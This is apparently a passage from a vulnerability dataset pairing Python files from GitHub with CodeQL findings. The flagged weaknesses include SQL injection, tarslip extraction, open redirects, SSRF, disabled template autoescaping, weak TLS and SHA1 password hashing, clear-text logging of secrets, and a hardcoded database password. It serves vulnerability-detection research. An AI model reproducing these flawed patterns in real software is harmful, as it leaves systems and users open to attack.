"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.",
"This expression logs [sensitive data (password)](1) as clear text."
] | [
41,
43
] | [
null,
null
] | [
46,
23
] | [
54,
32
] | |
2024-11-18T20:23:12.559434+00:00 | 1,638,261,643,000 | 89817f65771bdf2c1a4de9288c8dc96329c536e4 | 3 | {
"blob_id": "89817f65771bdf2c1a4de9288c8dc96329c536e4",
"branch_name": "refs/heads/master",
"committer_date": 1638261643000,
"content_id": "c696d714a69bc764bb49d752e9942eb2fdc7a603",
"detected_licenses": [
"MIT"
],
"directory_id": "d30011ebb5c273f35fab76b1ae92c67461b61114",
"extension": "py",
"fi... | 2.625 | stackv2 | import os
from jinja2 import Environment, FileSystemLoader
import json
import yaml
import pdfkit
from datetime import datetime
import argparse
import re
# Resume + Template Constants
CUSTOM_DATE_FORMAT = "%b %Y"
PATH_CAREER_CUP_DIRECTORY = "CareerCup"
PATH_CAREER_CUP_TEMPLATE = r"CareerCup/careerCupTemplate.html"
# ... | 61 | 28.9 | 88 | 16 | 409 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_94e8b259cb369887_d9f9fbf7", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
32
] | [
36
] | [
37
] | [
10
] | |
2024-11-18T20:23:15.121060+00:00 | 1,577,449,767,000 | 0d9c1127c1397ba8b15f1a12f8f54c598afc5609 | 3 | {
"blob_id": "0d9c1127c1397ba8b15f1a12f8f54c598afc5609",
"branch_name": "refs/heads/master",
"committer_date": 1577449767000,
"content_id": "101e1b10989b88d1d2f45aababc06995a5c6640b",
"detected_licenses": [
"MIT"
],
"directory_id": "54677e5558302f688ddc989bccd03b44642e039b",
"extension": "py",
"fi... | 2.640625 | stackv2 | from flask import Flask, jsonify, request
import mysql.connector
import datetime
conn = mysql.connector.connect(user="root",
password="0000",
host="localhost",
port="3307",
database="question")
n... | 64 | 28.36 | 115 | 14 | 440 | python | [{"finding_id": "codeql_py/sql-injection_fb045dfa1208e224_064f89bd", "tool_name": "codeql", "rule_id": "py/sql-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This SQL query depends on a [user-provided value](1).\nThis SQL query depends on a [user-provided value](2)."... | 1 | true | [
"CWE-089"
] | [
"py/sql-injection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This SQL query depends on a [user-provided value](1).\nThis SQL query depends on a [user-provided value](2)."
] | [
56
] | [
null
] | [
20
] | [
76
] | |
2024-11-18T20:23:26.815962+00:00 | 1,510,187,125,000 | a34502a01b8beeeb97f2c625c27d420fb9f2b2fa | 3 | {
"blob_id": "a34502a01b8beeeb97f2c625c27d420fb9f2b2fa",
"branch_name": "refs/heads/master",
"committer_date": 1510187125000,
"content_id": "9f0b69bed6dc322927c7198e1c77c559a9d95299",
"detected_licenses": [
"MIT"
],
"directory_id": "8f69e928d6112a6288598999aabf00fdb27bbb4b",
"extension": "py",
"fi... | 3.171875 | stackv2 | import sys
import string
if len(sys.argv) != 2:
sys.exit()
def cubemap(digits):
if len(digits) != 3:
raise IndexError
if not digits.isnumeric():
raise ValueError
a=int(digits[0])-1
b=int(digits[1])-1
c=int(digits[2])-1
if a < 0 or a > 5 or b < 0 or b > 5 or c < 0 or c > 5:
raise OverflowError
return a*3... | 30 | 20.23 | 89 | 14 | 202 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_b6da8c64a8c8abc6_0b898ff2", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
30
] | [
null
] | [
18
] | [
37
] | |
2024-11-18T20:23:36.591619+00:00 | 1,479,783,978,000 | 496ca0e6cac84749e10b5f9b4d372c3560388785 | 4 | {
"blob_id": "496ca0e6cac84749e10b5f9b4d372c3560388785",
"branch_name": "refs/heads/master",
"committer_date": 1479783978000,
"content_id": "3d23b46eb543eef03fee3e73dc0e070fb6cd838a",
"detected_licenses": [
"MIT"
],
"directory_id": "c3eb7ab0eb26d47c282d82d3b86ef3f309d3edcd",
"extension": "py",
"fi... | 3.640625 | stackv2 | from collections import defaultdict
import re
'''
You're running a pool of servers where the servers are numbered sequentially
starting from 1. Over time, any given server might explode, in which case its
server number is made available for reuse. When a new server is launched, it
should be given the lowest available ... | 85 | 27.45 | 78 | 12 | 615 | python | [{"finding_id": "codeql_py/overly-large-range_dcbc0b2e0ae43756_d3a7d512", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].", "remediation": "", "lo... | 1 | true | [
"CWE-020"
] | [
"py/overly-large-range"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\]."
] | [
73
] | [
null
] | [
39
] | [
42
] | |
2024-11-18T20:23:37.024627+00:00 | 1,612,163,609,000 | e485c6d8bb227e25286c107f81b114ef1abbb2be | 3 | {
"blob_id": "e485c6d8bb227e25286c107f81b114ef1abbb2be",
"branch_name": "refs/heads/master",
"committer_date": 1612163609000,
"content_id": "4b23c638a080dd56a0b897c91a3db14c2856efde",
"detected_licenses": [
"MIT"
],
"directory_id": "a582b97166a73b9b287700d54fe1a569211ad9c9",
"extension": "py",
"fi... | 2.796875 | stackv2 | import os
import shutil
import urllib
import zipfile
import tarfile
from tqdm import tqdm
class LambdaLR:
def __init__(self, n_epoch, offset, total_batch_size, decay_batch_size):
self.n_epoch = n_epoch
self.offset = offset
self.total_batch_size = total_batch_size
self.decay_batch_... | 62 | 28.05 | 103 | 18 | 429 | python | [{"finding_id": "codeql_py/tarslip_9e09eee8babc21c2_6f5bbe0c", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
31
] | [
null
] | [
5
] | [
12
] | |
2024-11-18T21:22:15.791253+00:00 | 1,632,151,278,000 | 796bcd575be9cd59d7b1926a3402fdd349f90f10 | 2 | {
"blob_id": "796bcd575be9cd59d7b1926a3402fdd349f90f10",
"branch_name": "refs/heads/main",
"committer_date": 1632151278000,
"content_id": "9ad940cb1e41b52332faef51af8aeede6da7175e",
"detected_licenses": [
"MIT"
],
"directory_id": "72c4153332863c18e59e852a89f8cb5460e9c8da",
"extension": "py",
"file... | 2.359375 | stackv2 | import os
import sys
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
# Append submodule path to python search path
sys.path.append(os.path.join(os.getcwd(), 'freeze'))
sys.path.append(os.path.join(os.getcwd(), 'tfrmod'))
sys.path.append(os.path.join(os.getcwd(), 'automl', 'efficientdet'))
# Tools to parse commands, zip and ... | 241 | 38.16 | 174 | 15 | 2,265 | python | [{"finding_id": "codeql_py/tarslip_51af8b1bb93e11b4_2d274800", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
41
] | [
null
] | [
5
] | [
8
] | |
2024-11-18T21:22:41.893264+00:00 | 1,608,331,542,000 | c813a72f1a78f9c078403e0576c14bd4008865ef | 3 | {
"blob_id": "c813a72f1a78f9c078403e0576c14bd4008865ef",
"branch_name": "refs/heads/main",
"committer_date": 1608331542000,
"content_id": "212356970a860051ed6e28ee1be66446e0681841",
"detected_licenses": [
"MIT"
],
"directory_id": "5167ef6304c0ae735752197328e6f7e5dd9abac2",
"extension": "py",
"file... | 2.59375 | stackv2 | from jinja2 import Template
import logging
import ssl
import smtplib
from email.message import EmailMessage
from scan_monitor import config
class SMTP:
"""Class that will send an SMTP email. """
def __init__(self, notification, template_file=config.default_template):
self.server = config.smtp_server
... | 59 | 31.93 | 84 | 19 | 382 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_49d7153331f11c95_13378130", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
26
] | [
null
] | [
23
] | [
54
] | |
2024-11-18T21:22:43.893155+00:00 | 1,554,042,624,000 | 1dd6c4b98d123949b65566d865dff93b20dfb55d | 3 | {
"blob_id": "1dd6c4b98d123949b65566d865dff93b20dfb55d",
"branch_name": "refs/heads/master",
"committer_date": 1554042624000,
"content_id": "c73a85c1326607d45e9aa32005caddfd79cd46ae",
"detected_licenses": [
"MIT"
],
"directory_id": "47b2348d6098aba51466276c1ae11369cea8cde7",
"extension": "py",
"fi... | 2.609375 | stackv2 | import board
import displayio
import digitalio
import busio
import adafruit_touchscreen
from adafruit_display_text.label import Label
from adafruit_bitmap_font import bitmap_font
from adafruit_esp32spi import adafruit_esp32spi
import adafruit_esp32spi.adafruit_esp32spi_requests as requests
from adafruit_esp32spi import... | 331 | 33.25 | 108 | 21 | 2,900 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_c67163b6885e6ac9_9c0a6fa8", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
44
] | [
null
] | [
40
] | [
48
] | |
2024-11-18T21:22:44.708368+00:00 | 1,601,561,766,000 | 220cf8459d13c0874f793212beecae1a79d3841e | 3 | {
"blob_id": "220cf8459d13c0874f793212beecae1a79d3841e",
"branch_name": "refs/heads/master",
"committer_date": 1601561766000,
"content_id": "8138fc3c24be6107c708ae4343ad9e2851813098",
"detected_licenses": [
"MIT"
],
"directory_id": "db99d9cd74341a96f612d83ae519a77badb12d01",
"extension": "py",
"fi... | 2.796875 | stackv2 | import ssl
import socket
import urllib.parse
from copy import deepcopy
from basic_http.util.networking import is_ip_address
from basic_http.data_structures.request import HttpRequest
from basic_http.data_structures.response import HttpResponse
class Connection(object):
def __init__(self):
self.__connectio... | 230 | 27.01 | 109 | 17 | 1,305 | python | [{"finding_id": "codeql_py/insecure-protocol_48909b37e328d2af_3da0f477", "tool_name": "codeql", "rule_id": "py/insecure-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/insecure-protocol",
"py/insecure-protocol"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol version TLSv1_1 allowed by [call to ssl.SSLContext](1).",
"Insecure SSL/TLS protocol version TLSv1 allowed by [call to ssl.SSLContext](1).\nInsecure SSL/TLS protocol version TLSv1_1 allowed by [call to ssl.... | [
65,
126
] | [
null,
null
] | [
20,
24
] | [
31,
35
] | |
2024-11-18T21:51:39.974520+00:00 | 1,589,043,472,000 | 03f3344c760adc2808f036fd56cb178f071ecd18 | 3 | {
"blob_id": "03f3344c760adc2808f036fd56cb178f071ecd18",
"branch_name": "refs/heads/master",
"committer_date": 1589043472000,
"content_id": "f5fea411c58ce289d176ec04fcca8593de28108a",
"detected_licenses": [
"MIT"
],
"directory_id": "03bd6964ef36b048ff3a3463484941b75e6dd4c4",
"extension": "py",
"fi... | 3 | stackv2 | """Implementations of Checker for zip and tar files."""
from pathlib import Path
import tarfile
import tempfile
import zipfile
from zipfile import ZipFile
from spot_check_files.checker import Checker, CheckResult, CheckRequest
class ZipChecker(Checker):
def __str__(self):
return 'ZipChecker'
"""Extra... | 59 | 26.9 | 76 | 18 | 347 | python | [{"finding_id": "codeql_py/tarslip_e29732291b240be6_86cb1a22", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
55
] | [
null
] | [
17
] | [
19
] | |
2024-11-18T21:51:46.144577+00:00 | 1,623,432,712,000 | daffaa823b6d0507623df78572305f5c39ba9935 | 3 | {
"blob_id": "daffaa823b6d0507623df78572305f5c39ba9935",
"branch_name": "refs/heads/main",
"committer_date": 1623432712000,
"content_id": "0b6429d3a90704d50560709b6dd1a94cd5ce0e5e",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "d69cd0d7789fb1477b4476891957fc08aa7989b0",
"extension": "py",
... | 2.8125 | stackv2 | from flask import redirect, render_template, url_for, flash, request, session, current_app
from shop import db, app
from shop.products.models import Addproduct
from shop.products.routes import brands, categories
import json
#la funzione MagerDicts non fa altro che accettare come parametri due "dizionari" o "liste" ed ... | 125 | 44.11 | 168 | 21 | 1,312 | python | [{"finding_id": "codeql_py/url-redirection_e86a372225b0dcee_69383b8e", "tool_name": "codeql", "rule_id": "py/url-redirection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Untrusted URL redirection depends on a [user-provided value](1).", "remediation": "", "location": {"file_... | 3 | true | [
"CWE-601",
"CWE-601",
"CWE-601"
] | [
"py/url-redirection",
"py/url-redirection",
"py/url-redirection"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Untrusted URL redirection depends on a [user-provided value](1).",
"Untrusted URL redirection depends on a [user-provided value](1).",
"Untrusted URL redirection depends on a [user-provided value](1).\nUntrusted URL redirection depends on a [user-provided value](1).\nUntrusted URL redirection depends on a [use... | [
43,
46,
53
] | [
null,
null,
null
] | [
37,
33,
25
] | [
53,
49,
41
] | |
2024-11-18T21:52:00.688694+00:00 | 1,629,459,648,000 | 61a57abc3452da8347e52c90de9428aefc203d2b | 3 | {
"blob_id": "61a57abc3452da8347e52c90de9428aefc203d2b",
"branch_name": "refs/heads/main",
"committer_date": 1629459648000,
"content_id": "0514d54fe9df3f2b74a1e823d39fdbba9ed58f97",
"detected_licenses": [
"MIT"
],
"directory_id": "16109f1a6eb38ad6a043502546ff4b16daac8fe8",
"extension": "py",
"file... | 2.828125 | stackv2 | import uvicorn
import requests
import uuid
from fastapi import FastAPI, Path
from typing import Optional
from pydantic import BaseModel
from config.config import config
class User(BaseModel):
name: str
username: str = uuid.uuid4()
email: Optional[str] = None
phone: Optional[str] = None
website: Op... | 220 | 26.13 | 104 | 16 | 1,286 | python | [{"finding_id": "codeql_py/partial-ssrf_66d36699d4ee3958_ef81f916", "tool_name": "codeql", "rule_id": "py/partial-ssrf", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "Part of the URL of this request depends on a [user-provided value](1).\nPart of the URL of this request depen... | 6 | true | [
"CWE-918",
"CWE-918",
"CWE-918",
"CWE-918",
"CWE-918",
"CWE-918"
] | [
"py/partial-ssrf",
"py/partial-ssrf",
"py/partial-ssrf",
"py/partial-ssrf",
"py/partial-ssrf",
"py/partial-ssrf"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Part of the URL of this request depends on a [user-provided value](1).\nPart of the URL of this request depends on a [user-provided value](2).",
"Part of the URL of this request depends on a [user-provided value](1).",
"Part of the URL of this request depends on a [user-provided value](1).",
"Part of the URL... | [
66,
89,
151,
157,
188,
190
] | [
67,
null,
null,
158,
null,
191
] | [
17,
16,
23,
28,
23,
28
] | [
70,
65,
72,
67,
72,
53
] | |
2024-11-18T22:16:42.312883+00:00 | 1,575,418,219,000 | f1025503c16d628c1e34d0d162752682fbd69357 | 4 | {
"blob_id": "f1025503c16d628c1e34d0d162752682fbd69357",
"branch_name": "refs/heads/master",
"committer_date": 1575418219000,
"content_id": "0349e2ca688dac82e34a5b95349b014edb1c853c",
"detected_licenses": [
"MIT"
],
"directory_id": "4e9f3c88233411f06a3551824f9df7bc89c9378e",
"extension": "py",
"fi... | 3.890625 | stackv2 | # Import required packages
import json
# Open the file and load json into 'data'
with open("workers.json",'r') as f:
data = json.load(f)
# We see the json is imported as dictionnary
print(type(data))
# Get the element 'Employee'
employees = data["Employee"]
print(type(employees))
for e in employees: # loop t... | 19 | 23.68 | 48 | 9 | 117 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_f3fb2c33617cd173_83d91e1a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text."
] | [
15
] | [
null
] | [
11
] | [
12
] | |
2024-11-18T22:27:42.517280+00:00 | 1,586,274,576,000 | 549acdb165fc202f88280a33daf429a9b9193a3c | 3 | {
"blob_id": "549acdb165fc202f88280a33daf429a9b9193a3c",
"branch_name": "refs/heads/master",
"committer_date": 1586274576000,
"content_id": "676302bcc631265f7cb9adbb552b67d233d21c15",
"detected_licenses": [
"MIT"
],
"directory_id": "893fcaa678e7bf1c2d3f6691ad9b4c704bef007b",
"extension": "py",
"fi... | 3.25 | stackv2 | code= """*********************************
Made By Ceasar Agbekuadzi
*********************************"""
print(code)
while True:
print("\n Welcome to the setup of the Game")
user_Name=input("\n PLease enter your name: ")
password=input("\n Please enter your password: ")
... | 27 | 28.44 | 68 | 11 | 160 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_30203d3db0cf6c4a_adc36b5d", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
19
] | [
null
] | [
24
] | [
32
] | |
2024-11-18T22:28:16.166379+00:00 | 1,500,369,462,000 | 9818efa8fa7da3752ad4ce51f291e2a95bc9d209 | 2 | {
"blob_id": "9818efa8fa7da3752ad4ce51f291e2a95bc9d209",
"branch_name": "refs/heads/master",
"committer_date": 1500369462000,
"content_id": "ab3d481e3d94305449e22c65bb6626b701316eed",
"detected_licenses": [
"MIT"
],
"directory_id": "ce3652741e1be2443c13329ef53b42cdc43c8efb",
"extension": "py",
"fi... | 2.359375 | stackv2 | from sqlalchemy import Column, ForeignKey, UniqueConstraint, String, Text
from sqlalchemy.orm import relationship
from sqlalchemy.orm import column_property, relationship, validates
from frt_server.common import CommonColumns
import frt_server.config
import hashlib
import string
import random
import os
from itsdange... | 105 | 35.13 | 106 | 20 | 806 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_bfbe7005a0dfd3f1_7d25b873", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expen... | [
91
] | [
null
] | [
33
] | [
76
] | |
2024-11-18T22:44:10.245600+00:00 | 1,313,886,783,000 | b0ee59d0623e887ee00c87ccc40c61b04202fd64 | 3 | {
"blob_id": "b0ee59d0623e887ee00c87ccc40c61b04202fd64",
"branch_name": "refs/heads/master",
"committer_date": 1313886783000,
"content_id": "66849628d4c03b6df1ba3788ff315ba0a3754eb9",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "74b2206cd20b6150549f8c9a31abf4cb0d4f6363",
"extension": "py"... | 2.765625 | stackv2 | """GENERIC HANDLER
Template for handler tools.
Unless stated otherwise, code here is adapted from code.google.com/p/ph-sms/source/browse/trunk/python/mh_handlers/__init__.py
"""
# IMPORTS START HERE ---------------------------------------------------------
# standard library imports
from __future__ import with_sta... | 90 | 30.69 | 128 | 14 | 548 | python | [{"finding_id": "codeql_py/overly-permissive-file_1391f12901658dff_f4c34381", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ... | 1 | true | [
"CWE-732"
] | [
"py/overly-permissive-file"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world writable."
] | [
82
] | [
null
] | [
13
] | [
31
] | |
2024-11-18T22:44:46.956706+00:00 | 1,610,642,521,000 | 6e0bc20254e0c3085919e82ec1448d9db2ef6d10 | 2 | {
"blob_id": "6e0bc20254e0c3085919e82ec1448d9db2ef6d10",
"branch_name": "refs/heads/master",
"committer_date": 1610642521000,
"content_id": "8f5d2d704aaa1d32109129715de54e515a8c8f20",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "c0088e4900dfd1451085bee045f0be5a61835a93",
"extension": "py"... | 2.390625 | stackv2 | import requests
import json
from datasources import ds_csv_1
result = requests.post('http://localhost:8080/simjoin/api/addsource',
data=json.dumps(ds_csv_1),
headers={'Content-Type':'application/json',
'accept': 'application/js... | 24 | 34 | 72 | 10 | 162 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0fd56aaca3ad96e3_8b309af9", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
13
] | [
null
] | [
7
] | [
46
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.